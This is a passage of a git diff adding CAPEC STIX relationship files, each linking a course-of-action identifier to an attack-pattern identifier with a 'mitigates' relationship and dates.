"relationship_type": "mitigates", + "source_ref": "course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab", + "target_ref": "attack-pattern--fa6a0a3c-2056-42e4-8e16-cad392c96890", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--91c36161-4a18-4529-8808-c0c86bf202c1.json b/capec/relationship/relationship--91c36161-4a18-4529-8808-c0c86bf202c1.json new file mode 100644 index 0000000000..17aa040264 --- /dev/null +++ b/capec/relationship/relationship--91c36161-4a18-4529-8808-c0c86bf202c1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c7201367-8fea-4fa8-a530-8fb4ab4c3ce8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--91c36161-4a18-4529-8808-c0c86bf202c1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ada16564-6893-4613-ab31-1956904689fa", + "target_ref": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee.json b/capec/relationship/relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee.json new file mode 100644 index 0000000000..b70f03a5c4 --- /dev/null +++ b/capec/relationship/relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--02b79a42-0457-4f3e-97a1-f9fb295a76ad", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--91f8ddb2-7263-40a3-8ec1-becbc72ff0ee", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4c5192c-fba5-4927-a9a3-65cf4388e7ad", + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7.json b/capec/relationship/relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7.json new file mode 100644 index 0000000000..2ace3407a4 --- /dev/null +++ b/capec/relationship/relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3b73c825-9936-4e26-9f52-5b3404463f6c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--926ec109-c4a7-4b3c-937f-9b24ebec9ed7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1", + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--927081e8-eca0-40a8-8c97-382dfcb06c30.json b/capec/relationship/relationship--927081e8-eca0-40a8-8c97-382dfcb06c30.json new file mode 100644 index 0000000000..e6f9ae95bc --- /dev/null +++ b/capec/relationship/relationship--927081e8-eca0-40a8-8c97-382dfcb06c30.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--23428a7a-30fc-4ead-b1f4-1d965c9c8558", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--927081e8-eca0-40a8-8c97-382dfcb06c30", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-04-25T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f68b94c3-995d-4964-a187-bbe61ddbaac0", + "target_ref": "attack-pattern--c15d4233-e0f7-4992-862c-862da665a29f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0.json b/capec/relationship/relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0.json new file mode 100644 index 0000000000..b841d9d2fb --- /dev/null +++ b/capec/relationship/relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--248fdcfd-3499-4e76-9570-f916de0d5a05", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--92c11af4-116d-4550-ba14-1b9ab2fd48a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dac433fc-a4e6-4cb0-b8ec-2f6d2f1adf3b", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--92ef7475-3bec-49f5-945c-8fa2019350ef.json b/capec/relationship/relationship--92ef7475-3bec-49f5-945c-8fa2019350ef.json new file mode 100644 index 0000000000..edf35992e8 --- /dev/null +++ b/capec/relationship/relationship--92ef7475-3bec-49f5-945c-8fa2019350ef.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4712869b-d722-4263-bdfe-9e13717cc6b2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--92ef7475-3bec-49f5-945c-8fa2019350ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d", + "target_ref": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9304375a-3ec0-4ab2-9134-a129993052b6.json b/capec/relationship/relationship--9304375a-3ec0-4ab2-9134-a129993052b6.json new file mode 100644 index 0000000000..656a2756e4 --- /dev/null +++ b/capec/relationship/relationship--9304375a-3ec0-4ab2-9134-a129993052b6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b309eadd-5f6b-4e45-8349-016cb09ab4b2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9304375a-3ec0-4ab2-9134-a129993052b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa59f657-f598-4b2e-969a-fc688eb3fa2b", + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--93532399-3fea-4db4-9111-c588139409ff.json b/capec/relationship/relationship--93532399-3fea-4db4-9111-c588139409ff.json new file mode 100644 index 0000000000..ee21b5ba4e --- /dev/null +++ b/capec/relationship/relationship--93532399-3fea-4db4-9111-c588139409ff.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--54081e8f-8b49-4e2c-a96a-06aaba75244b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--93532399-3fea-4db4-9111-c588139409ff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6", + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--93e11447-0480-49d7-aaad-956638fa7bf2.json b/capec/relationship/relationship--93e11447-0480-49d7-aaad-956638fa7bf2.json new file mode 100644 index 0000000000..2225aedea9 --- /dev/null +++ b/capec/relationship/relationship--93e11447-0480-49d7-aaad-956638fa7bf2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e52a89d3-2a6c-4cb1-8084-a64cfa1411bc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--93e11447-0480-49d7-aaad-956638fa7bf2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--93e582b6-8370-4188-bdcf-2158965b6ac7.json b/capec/relationship/relationship--93e582b6-8370-4188-bdcf-2158965b6ac7.json new file mode 100644 index 0000000000..2fcb6a4cc2 --- /dev/null +++ b/capec/relationship/relationship--93e582b6-8370-4188-bdcf-2158965b6ac7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8904fc29-d0d0-4ee4-8487-f3f22c7c6c9a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--93e582b6-8370-4188-bdcf-2158965b6ac7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac658283-b4b3-4659-8c55-1356281d2e44", + "target_ref": "attack-pattern--705249bd-b1ea-4723-bb50-afd62f6bd16e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082.json b/capec/relationship/relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082.json new file mode 100644 index 0000000000..3ca4342ec8 --- /dev/null +++ b/capec/relationship/relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dab3e0ec-a591-43be-b222-1b850e2e12e7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--94846665-2cb7-4efe-a38f-f8bdf646bb70.json b/capec/relationship/relationship--94846665-2cb7-4efe-a38f-f8bdf646bb70.json new file mode 100644 index 0000000000..aaf1235aeb --- /dev/null +++ b/capec/relationship/relationship--94846665-2cb7-4efe-a38f-f8bdf646bb70.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--65f45c68-b82d-41fd-be2a-d48c83546acd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--94846665-2cb7-4efe-a38f-f8bdf646bb70", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab", + "target_ref": "attack-pattern--b3ddfb17-e193-40c6-97c8-cea72b096dec", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--94a20952-5cb4-48c2-bccc-ab2ec6376b59.json b/capec/relationship/relationship--94a20952-5cb4-48c2-bccc-ab2ec6376b59.json new file mode 100644 index 0000000000..ce20b6b507 --- /dev/null +++ b/capec/relationship/relationship--94a20952-5cb4-48c2-bccc-ab2ec6376b59.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--37c9ff54-1f70-44cc-a21d-7823d944a32e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--94a20952-5cb4-48c2-bccc-ab2ec6376b59", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79.json b/capec/relationship/relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79.json new file mode 100644 index 0000000000..c3a94f9ca5 --- /dev/null +++ b/capec/relationship/relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--70a8b697-0799-41be-ae06-fa6fcf3d7cd7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--94ce1a99-d4d8-479e-bcb5-d153a4d61f79", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8b3b88a-878a-47d2-913c-15849706d1c4", + "target_ref": "attack-pattern--2372b712-3a94-46d5-86d4-67d489cdbf95", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--95146f5b-2bf7-47fb-a30c-9c8176408c91.json b/capec/relationship/relationship--95146f5b-2bf7-47fb-a30c-9c8176408c91.json new file mode 100644 index 0000000000..dbb2c76477 --- /dev/null +++ b/capec/relationship/relationship--95146f5b-2bf7-47fb-a30c-9c8176408c91.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8df55d5b-b04d-46d7-a138-a41d860f52c8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--95146f5b-2bf7-47fb-a30c-9c8176408c91", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c431013e-7256-4f54-a26b-b705a2ebdcfd", + "target_ref": "attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--956c0201-08bf-474c-ab45-a211617432ba.json b/capec/relationship/relationship--956c0201-08bf-474c-ab45-a211617432ba.json new file mode 100644 index 0000000000..35763c2f69 --- /dev/null +++ b/capec/relationship/relationship--956c0201-08bf-474c-ab45-a211617432ba.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a9c0dd61-61fc-45a5-a0f1-c064a88880ac", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--956c0201-08bf-474c-ab45-a211617432ba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e25cd1a6-2a1c-4c1f-b6fb-b09d0effdf63", + "target_ref": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--95cf9e22-8502-4284-8803-e6b51f5e3520.json b/capec/relationship/relationship--95cf9e22-8502-4284-8803-e6b51f5e3520.json new file mode 100644 index 0000000000..8c3467b844 --- /dev/null +++ b/capec/relationship/relationship--95cf9e22-8502-4284-8803-e6b51f5e3520.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--cbb9d7d8-4955-4b5f-ba52-3aed502921b7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--95cf9e22-8502-4284-8803-e6b51f5e3520", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--967de655-db81-4012-959a-55f1a9673fc9.json b/capec/relationship/relationship--967de655-db81-4012-959a-55f1a9673fc9.json new file mode 100644 index 0000000000..9ca5e35220 --- /dev/null +++ b/capec/relationship/relationship--967de655-db81-4012-959a-55f1a9673fc9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--78643c31-38b2-4de4-836f-d91ee4d7336f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--967de655-db81-4012-959a-55f1a9673fc9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97", + "target_ref": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--97626d09-376c-4acf-b43a-64f496130d56.json b/capec/relationship/relationship--97626d09-376c-4acf-b43a-64f496130d56.json new file mode 100644 index 0000000000..96e795e407 --- /dev/null +++ b/capec/relationship/relationship--97626d09-376c-4acf-b43a-64f496130d56.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6cf91090-96d6-4996-b56e-ce0a842b0433", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--97626d09-376c-4acf-b43a-64f496130d56", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639", + "target_ref": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--978d5ab4-e6d1-42c0-9135-320cebd99221.json b/capec/relationship/relationship--978d5ab4-e6d1-42c0-9135-320cebd99221.json new file mode 100644 index 0000000000..181b844686 --- /dev/null +++ b/capec/relationship/relationship--978d5ab4-e6d1-42c0-9135-320cebd99221.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--54a74aae-a659-4fcd-99fc-94032c5bd59e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--978d5ab4-e6d1-42c0-9135-320cebd99221", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926", + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--97f8c959-d8f0-4569-99bb-cd3016c7c5bc.json b/capec/relationship/relationship--97f8c959-d8f0-4569-99bb-cd3016c7c5bc.json new file mode 100644 index 0000000000..1dcd1b68ac --- /dev/null +++ b/capec/relationship/relationship--97f8c959-d8f0-4569-99bb-cd3016c7c5bc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--04a2674c-1bf8-4137-bbd1-09ef5be3cda6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--97f8c959-d8f0-4569-99bb-cd3016c7c5bc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c", + "target_ref": "attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5.json b/capec/relationship/relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5.json new file mode 100644 index 0000000000..aaa1669160 --- /dev/null +++ b/capec/relationship/relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--829c0a38-2bc5-41ac-bcbd-bc99bb072d3f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9816bf94-06d8-4eb0-9d7d-6bf0f30107e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--766199a6-728f-4772-9a27-191e5f8a072e", + "target_ref": "attack-pattern--1eb173db-e5ae-4bf1-b5e4-b4d944ded3db", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--982673e3-3d4c-4c23-850f-c844a41e83a0.json b/capec/relationship/relationship--982673e3-3d4c-4c23-850f-c844a41e83a0.json new file mode 100644 index 0000000000..79a425a8d1 --- /dev/null +++ b/capec/relationship/relationship--982673e3-3d4c-4c23-850f-c844a41e83a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d11aea75-75c7-4283-8d78-bae198795c48", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--982673e3-3d4c-4c23-850f-c844a41e83a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8963b9b0-eb57-4450-ade8-dd7d42426c32", + "target_ref": "attack-pattern--222cae7b-e00f-48e2-813a-efac031dfa65", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c.json b/capec/relationship/relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c.json new file mode 100644 index 0000000000..0305eced85 --- /dev/null +++ b/capec/relationship/relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e1d8bfb5-bc46-4a38-a617-8e69cab85b3e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--98e0dbe6-a94a-4303-9459-def28183f15b.json b/capec/relationship/relationship--98e0dbe6-a94a-4303-9459-def28183f15b.json new file mode 100644 index 0000000000..44d7e59351 --- /dev/null +++ b/capec/relationship/relationship--98e0dbe6-a94a-4303-9459-def28183f15b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--15bff431-1de5-4cbe-a910-77628b8ecec2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--98e0dbe6-a94a-4303-9459-def28183f15b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac2ade22-d841-404a-8a86-d98f9031ce97", + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--98e84fa7-8d01-47f0-b042-01de86a716a5.json b/capec/relationship/relationship--98e84fa7-8d01-47f0-b042-01de86a716a5.json new file mode 100644 index 0000000000..d93c8d5c4c --- /dev/null +++ b/capec/relationship/relationship--98e84fa7-8d01-47f0-b042-01de86a716a5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--98845619-6047-4b73-a36b-d675c0d87d15", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--98e84fa7-8d01-47f0-b042-01de86a716a5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c11a6349-369a-4b58-a5d7-782c51038cd8", + "target_ref": "attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--99ab01a2-3d66-43bc-8f26-933c354de81b.json b/capec/relationship/relationship--99ab01a2-3d66-43bc-8f26-933c354de81b.json new file mode 100644 index 0000000000..aede910b88 --- /dev/null +++ b/capec/relationship/relationship--99ab01a2-3d66-43bc-8f26-933c354de81b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f87bfe74-8d86-4faa-9816-4eab1f054b91", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--99ab01a2-3d66-43bc-8f26-933c354de81b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e9eba5c-8854-484c-9658-e9a241568533", + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--9a8a083e-85bb-46b5-83ff-791e98fdd243.json b/capec/relationship/relationship--9a8a083e-85bb-46b5-83ff-791e98fdd243.json new file mode 100644 index 0000000000..b7400154fd --- /dev/null +++ b/capec/relationship/relationship--9a8a083e-85bb-46b5-83ff-791e98fdd243.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bbebfd34-3ad2-410e-8afd-d8489b469880", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--9a8a083e-85bb-46b5-83ff-791e98fdd243", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": 